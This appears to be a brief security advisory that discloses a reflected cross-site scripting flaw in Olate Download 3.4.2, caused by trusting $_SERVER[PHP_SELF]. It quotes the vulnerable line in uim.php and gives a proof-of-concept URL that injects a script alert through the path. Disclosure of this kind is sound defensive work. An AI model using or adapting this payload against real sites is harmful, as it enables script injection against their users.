-Summary-
Software: Olate Download
Sowtwares Web Site: http://www.olate.co.uk/
Versions: 3.4.2
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei addmimistrator
Risk Level: Middel
Description
Olate download is prone to Cross site scripting, cause of trusting to unsafe variable, $_SERVER[PHP_SELF].
Programmers team, trusted that $_SERVER[PHP_SELF] contained executed php file. I was reading bug report of this issue in php support site. it was reported as a bug but support team accepted this as a documentation bug.
Related code lied at:386 uim.php
$global_vars[php_self] = $_SERVER[PHP_SELF];
Exploit-

olate/files.php/fffffff%22%3E%3Cscript%3E
alert(1)%3C/script%3Ef/?cat=1
Solution
Not any updates available~
Credit
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com